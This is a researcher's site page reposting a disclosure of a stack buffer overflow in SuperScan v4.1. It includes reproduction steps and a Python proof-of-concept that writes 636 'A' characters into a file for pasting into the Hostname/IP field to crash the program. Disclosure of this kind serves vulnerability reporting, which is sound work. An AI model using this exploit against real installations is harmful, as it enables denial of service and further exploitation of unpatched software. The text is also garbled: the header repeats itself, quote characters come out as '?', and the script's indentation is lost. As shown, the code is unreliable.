Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Exploit Title: SuperScan v4.1 - Stack Buffer Overflow (PoC)
Discovered by: Exploit Title: SuperScan v4.1 - Stack Buffer Overflow (PoC)
Discovered by: Ahmet ?mit BAYRAM
Discovered Date: 18.09.2023
Vendor: Foundstone Inc
Software Link: https://delivery2.filecroco.com/kits_6/superscan-4.1.zip
Tested Version: v4.1 (latest)
Tested on: Windows 2019 Server 64bit
Steps to Reproduce

Open the SuperScan application.
Paste the content of poc.txt into the Hostname / IP box.
Click the arrow button next to the box.
The application crashes due to a buffer overflow.

Proof of Concept (PoC)

The following Python script generates a poc.txt file containing the
payload. When loaded into the Hostname / IP field, it triggers a buffer
overflow and crashes the application.

#!/usr/bin/python

poc = ?A? * 636

try:
with open("poc.txt", "w") as file:
file.write(poc)
print("POC is created")
except Exception as e:
print("POC is not created:", e)